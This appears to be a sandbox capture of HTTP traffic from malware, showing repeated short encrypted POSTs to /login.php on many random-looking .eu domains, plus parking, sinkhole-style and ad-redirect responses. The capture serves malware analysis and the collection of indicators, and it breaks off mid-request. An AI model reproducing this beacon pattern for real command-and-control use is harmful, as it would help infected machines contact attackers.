POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.pupujeguper.eu
Vary: Accept-Encoding


GET /519227042aaa4d45b3d8d04c6d6182c2 HTTP/1.1
Host: xsso.vofozymufok.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu
19..Landed vofozymufok.eu<br>..0..


GET /bd3d82839c544969cd7e5b6b151fa69e HTTP/1.1
Host: xsso.qeqinuqypoq.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu
19..Landed qeqinuqypoq.eu<br>..0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xugiqonenuz.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=909bfe917d8125c576546cf2675a42ec; Expires=Fri, 18 Nov 2022 09:09:18 GMT
Date: Fri, 20 Nov 2015 09:09:18 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8


GET /domain/lyvejujolec.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu
Location: hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8
3e..Go hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8..0.
.


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:48 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.qekikyvutic.eu
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address
>.</body></html>.



POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address
>.</body></html>.


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.rynyhipexon.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:41 GMT
Server: Apache
Set-Cookie: vsid=905vr1955561817007335; expires=Wed, 18-Nov-2020 09:09:41 GMT; path=/; domain=ww92.rynyhipexon.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXuaD8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=63
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.lykemujebeq.eu
Vary: Accept-Encoding


GET /domain/jewuqyjywyv.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu
Location: hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411
3e..Go hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411..0.
.


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/nojejecebuw.eu
Set-Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


GET /domain/tucyguqaciq.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu
Location: hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424
3e..Go hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424..0.
.


GET /f89965e1c0417ff83998ff3762e77e38 HTTP/1.1
Host: xsso.ciliqikytec.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu
19..Landed ciliqikytec.eu<br>..0..


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.xuqufyduras.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/ciliqikytec.eu
Set-Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.kevedorozup.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=918vr1955561445810499; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.kevedorozup.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwEzGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=104
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digusebyvad.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:15 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.digusebyvad.eu
Vary: Accept-Encoding


GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.dimutobihom.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:00 GMT
Server: Apache
Set-Cookie: vsid=918vr1955561406202917; expires=Wed, 18-Nov-2020 09:09:00 GMT; path=/; domain=ww92.dimutobihom.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52KQPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=116
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.nozulufynax.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.norumikemem.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.lyvufixyvet.eu
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:19:04 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvufixyvet.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:10 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.lyvufixyvet.eu
Vary: Accept-Encoding


GET /zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525 HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ze1.zeroredirect1.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'
x-content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'
X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline'
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 20 Nov 2015 09:08:59 GMT
Server: ZeroPark-Traffic
3ed..<!DOCTYPE html>.<html>..<head>...<META http-
equiv="refresh" content="1;URL='hXXp://ze1.zeroredirect2.com/zcredirec
t?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&type=meta'">..</h
ead>..<body>...<script type="text/javascript">....setTi
meout(function () {.....var pageWidth = window.innerWidth ? window.inn
erWidth : (document.documentElement && document.documentElement.client
Width ? document.documentElement.clientWidth : document.getElementsByT
agName('body')[0].clientWidth);.....var pageHeight = window.innerHeigh
t ? window.innerHeight : (document.documentElement && document.documen
tElement.clientHeight ? document.documentElement.clientHeight : docume
nt.getElementsByTagName('body')[0].clientHeight);.....var iframeDetect
ed = window.self !== window.top;.....window.location="hXXp://ze1.zeror
edirect2.com/zcredirect?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&t
ype=js&browserWidth=" pageWidth "&browserHeight=" pageHeight "&i
frameDetected=" iframeDetected;....}, 1);...</script>..</bo
dy>.</html>..0..

<<< skipped >>>

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:52 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.nozulufynax.eu
Vary: Accept-Encoding



POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:55 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.nozulufynax.eu
Vary: Accept-Encoding


GET /90623dde15463e9fb45001ad5063db65 HTTP/1.1
Host: xsso.nopegymozow.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu
19..Landed nopegymozow.eu<br>..0..


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digivehusyd.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=e90c55b2c9a14c217bf26ca73db4527f; Expires=Fri, 18 Nov 2022 09:08:59 GMT
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:39 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.qetuluvolos.eu
Vary: Accept-Encoding



POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:43 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.qetuluvolos.eu
Vary: Accept-Encoding


GET /domain/rynazuqihoj.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu
Location: hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888
3e..Go hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888..0.
.


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.galokusemus.eu
Vary: Accept-Encoding


GET /4abc123f5bc1fe014bbeb686d9306960 HTTP/1.1
Host: xsso.marytymenok.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu
19..Landed marytymenok.eu<br>..0..


GET /domain/vofozymufok.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu
Location: hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2
3e..Go hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2..0.
.


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynyhipexon.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:11 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.rynyhipexon.eu
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.dimutobihom.eu
Vary: Accept-Encoding


POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
